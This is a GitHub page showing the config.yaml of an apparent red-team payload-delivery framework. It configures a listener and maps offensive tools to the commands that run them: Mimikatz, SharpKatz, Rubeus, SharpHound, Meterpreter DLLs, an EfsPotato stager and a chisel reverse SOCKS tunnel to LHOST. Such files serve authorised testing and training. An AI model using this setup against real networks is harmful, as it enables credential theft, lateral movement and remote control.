-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathconfig.yaml
More file actions
134 lines (130 loc) · 3.73 KB
/
config.yaml
File metadata and controls
134 lines (130 loc) · 3.73 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
listener:
interface: tap0
lport: 443
webroot_url: https://10.0.0.1/
webroot_dir: ./webroot
ps_tools:
adpeas:
location: adPEAS.ps1
cmd: Invoke-adPEAS
getuserspns:
location: tools/GetUserSPNs.ps1
hostrecon:
location: tools/HostRecon.ps1
cmd: Invoke-HostRecon
lapstoolkit:
location: tools/LAPSToolkit.ps1
cmd: Get-LAPSComputers
rubeus-ps:
location: tools/PowerSharpPack/PowerSharpBinaries/Invoke-Rubeus.ps1
cmd: Invoke-Rubeus -Command "klist"
powermad:
location: tools/powermad.ps1
powersharppack:
location: tools/PowerSharpPack/PowerSharpPack.ps1
cmd: PowerSharpPack -seatbelt
powerupsql:
location: tools/PowerUpSQL.ps1
cmd: Invoke-SQLAudit
powerview:
location: tools/powerview.ps1
runtxt:
location: run.txt
scshell-ps:
location: tools/PowerSharpPack/PowerSharpBinaries/Invoke-SCShell.ps1
cmd: Invoke-SCShell -Command ""
seatbelt-ps:
location: tools/PowerSharpPack/PowerSharpBinaries/Invoke-Seatbelt.ps1
cmd: Invoke-Seatbelt -Command "-group=system"
sharphound-ps:
location: tools/PowerSharpPack/PowerSharpBinaries/Invoke-SharpHound4.ps1
cmd: Invoke-SharpHound4
sharpsploit-ps:
location: tools/PowerSharpPack/PowerSharpBinaries/Invoke-SharpSploit.ps1
cmd: Invoke-SharpSploit
sharpersist-ps:
location: tools/PowerSharpPack/PowerSharpBinaries/Invoke-SharPersist.ps1
cmd: Invoke-SharPersist -Command "-t service -m list"
sharpkatz-ps:
location: tools/PowerSharpPack/PowerSharpBinaries/Invoke-SharpKatz.ps1
cmd: Invoke-SharpKatz
sharpview-ps:
location: tools/PowerSharpPack/PowerSharpBinaries/Invoke-Sharpview.ps1
cmd: Invoke-Sharpview -Command "Get-DomainController"; Invoke-Sharpview -Command "Get-NetShare" ; Invoke-Sharpview -Command "Find-InterestingFile"; Invoke-Sharpview -Command "Find-InterestingDomainShareFile"
winpeas-ps:
location: tools/PowerSharpPack/PowerSharpBinaries/Invoke-winPEAS.ps1
cmd: Invoke-winPEAS
winpwn:
location: tools/WinPwn/Offline_WinPwn.ps1
cmd: WinPwn
zip_tools:
sysinternals:
location: tools/sysinternals.zip
mimikatz:
location: tools/mimikatz.zip
exe_tools:
chisel:
location: tools/chisel.exe
cmd: "client http://LHOST:8443 R:1081:socks"
cs_tools:
adhunttool:
location: tools/ADHuntTool.exe
class: ADHuntTool.Program
cmd: DumpAllUsers RingZer0
evilsqlclient:
location: tools/esc.exe
class: evilsqlclient.Program
cmd: " "
winpeas:
location: tools/winPEASx64.exe
class: winPEAS.Program
efspotato:
location: EfsPotato.exe
class: EfsPotato.Program
cmd: STAGER_URL
metdll:
location: met.dll
class: LeMans.Class1
entrypoint: ferrari
metexe:
location: met.exe
class: LeMans.Class1
pslessexec:
location: tools/PSLessExec.exe
class: PSLessExec.Program
cmd: appsrv01 SensorService notepad.exe
rubeus:
location: tools/Rubeus.exe
class: Rubeus.Program
cmd: triage
scshell:
location: tools/SharpSCShell.exe
class: SharpSCShell.Program
seatbelt:
location: tools/Seatbelt.exe
class: Seatbelt.Program
cmd: -group=system
sharpsploit:
location: tools/SharpSploit.exe
class: SharpSploit.Program
spoolsample:
location: tools/SpoolSample.exe
class: SpoolSample.Program
sharppersist:
location: tools/SharpPersist.exe
class: SharPersist.Program
sqlclient:
location: tools/SQLClient.exe
class: SQLClient.Program
cmd: " "
sharpup:
location: tools/SharpUp.exe
class: SharpUp.Program
cmd: audit
sharprdp:
location: tools/SharpRDP.exe
class: SharpRDP.Program
sharphound:
location: tools/SharpHound.exe
class: SharpHound.Program
cmd: -d example.com --OutputDirectory C:\windows\tasks -c All,GPOLocalGroup